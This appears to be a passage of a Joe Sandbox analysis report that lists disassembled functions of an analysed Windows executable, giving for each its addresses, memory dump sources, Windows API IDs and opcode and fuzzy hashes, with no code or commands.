                                                                                                                                                                                                                                                        Function 00007FF606384C70 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1392018926-0
                                                                                                                                                                                                                                                        • Opcode ID: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                                                                                                        • Instruction ID: 13d20d1ff0de733521bd88692d1239112b06165209debdb874967098018987ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6621E562E4D74769EA69CB11D0003F557E4AF41794F656131DE4CC2BA3EEBED48AC380
                                                                                                                                                                                                                                                        Function 00007FF60638AEE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                                                                                                        • Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                                                                                                        • Instruction ID: 82a6ae1515b694ab51fd16fbb1a3df288cbabbfea7d7c1216ae113dd5382f196
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA116D75B087418AEB089F1AB8401A877A1BB99FC0F64543ADE5CD3361EF7EE9518384
                                                                                                                                                                                                                                                        Function 00007FF606384D50 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                                                                                                        • Instruction ID: d73b6292c9b7d266114e6b530665bcce423c46eb57c07caf4f292708feb181a4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6211A821A1874286EB648B25E4402B863A0FF44BA4F746331DA3DD26E6DF6DD456C740
                                                                                                                                                                                                                                                        Function 00007FF60638215C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3322643685-0
                                                                                                                                                                                                                                                        • Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                                                                                                        • Instruction ID: 8f8f7a439e7171f069be96ace60b6e883103ee00c897aac24f35c98e125a4d7f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E019E20B1C38A85FF1D5762A4042FA17916F85B40F382035CE0DC62E9EEAFEA8583D0
                                                                                                                                                                                                                                                        Function 00007FF6063A5AE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1173176844-0
                                                                                                                                                                                                                                                        • Opcode ID: 2418f657b74aff0bbbd954836f942504a57e752e7ff65bc5a56a0d55cdee3a56
                                                                                                                                                                                                                                                        • Instruction ID: ca7f81338e3f1c18cb70e22faa520a400d563397f8c5c94a88210b7c27ae1d4e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2418f657b74aff0bbbd954836f942504a57e752e7ff65bc5a56a0d55cdee3a56
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEE0E221F1920B45FD6D2262146A0B500808F29371E3C3B30D93EC96D3AD1EA496A2E0
                                                                                                                                                                                                                                                        Function 00007FF6063B0E1C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        • Opcode ID: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                                                                                                                                                                                                                                        • Instruction ID: 638bd01544b5aedb5ac392cbb5e30cac07f8ff0a9963ffa379f6c784c5ed1726
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EE0C210F09E4342FF0DABF2984417A52D0AF98B40F247430CB0EC62A1EF2EA48686C0
                                                                                                                                                                                                                                                        Function 00007FF606386858 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1017591355-0
                                                                                                                                                                                                                                                        • Opcode ID: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
                                                                                                                                                                                                                                                        • Instruction ID: fdc1ffabfa57865e1fed67dd46fec3a0d1ebb24f392ef2ec53fea9354f128116
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F614351E0C75348FE6C9B1184162FA6291AF42BD4F34B135EE4EC26E6EEAFE4418280
                                                                                                                                                                                                                                                        Function 00007FF606394A98 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3668304517-0
                                                                                                                                                                                                                                                        • Opcode ID: 9ca4a83d2b63779bf708ac485e26fdd1a63016ab321697bfea32e07a43e704da
                                                                                                                                                                                                                                                        • Instruction ID: 8ddf0bbd578c7527ac25a50ae51fc28db0f837c2e7af72461d59fe1c0019153b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca4a83d2b63779bf708ac485e26fdd1a63016ab321697bfea32e07a43e704da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4671C322F1865244FF18DB65D4802BD22A1FF44798F706131ED1ED36D6EE2EA8868790
                                                                                                                                                                                                                                                        Function 00007FF6063976F8 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606386288: FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6063979DB
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1011579015-0
                                                                                                                                                                                                                                                        • Opcode ID: badc78b1171942a7d3096e5594fb818a2bb200fdfb059f9f01d9a7c201ae8695
                                                                                                                                                                                                                                                        • Instruction ID: 960aead64344e98fac277f0bd352cee70c6cb7bca54e01b187aa75d743f5e58f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: badc78b1171942a7d3096e5594fb818a2bb200fdfb059f9f01d9a7c201ae8695
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE816A61E1CB4385FB689B25A84137823E5EF84798F342135D95DC32E1EE7EE88187E0
                                                                                                                                                                                                                                                        Function 00007FF606399A70 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3668304517-0
                                                                                                                                                                                                                                                        • Opcode ID: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
                                                                                                                                                                                                                                                        • Instruction ID: e671d4d3dd9df196fa7abb8f9473c44ab60ac92428828ba86b3d34ff926d1850
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC619721E0C78281FA68DB14E8C53FD6391EF94748F646135D98DC2AE5DEBEE480CB90
                                                                                                                                                                                                                                                        Function 00007FF60638552C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3668304517-0
                                                                                                                                                                                                                                                        • Opcode ID: 54602dd0ec26bd2d79ceeb5ca0cc47b122a19acca21d15c1e6fc8212b5c90648
                                                                                                                                                                                                                                                        • Instruction ID: 794f581488ca43fe3cfdad2ddda203b391d757c7ab05476a5a91c9a1dc55e767
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54602dd0ec26bd2d79ceeb5ca0cc47b122a19acca21d15c1e6fc8212b5c90648
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F41E122A08B4584EE588F24D1453B963A1EB44BE8F643234EA5DC77B9DFBEE441C680
                                                                                                                                                                                                                                                        Function 00007FF6063AF2D8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        • Opcode ID: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                                                                                                                                                                                                                                        • Instruction ID: f356edc1ceeb96a1675b2e86fbaa1cb976aa07423af490ef04f9a3d4af32cd7a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC41AD21E18B0382FF2D9B25E99027962A1AF50741F64743ADA4EC76D1EF3FE84493C1
                                                                                                                                                                                                                                                        Function 00007FF606394EE4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606386288: FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606395023
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1011579015-0
                                                                                                                                                                                                                                                        • Opcode ID: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
                                                                                                                                                                                                                                                        • Instruction ID: 76ab974c680bceb540491ca59ca1d7b6abb27100b9ffe074bb44afa9b5e26f7c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB31A131B18B8681EE189B15E440379A3D0FF847D8F606235EA9E87B96DF7EE4418790
                                                                                                                                                                                                                                                        Function 00007FF6063B46DC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
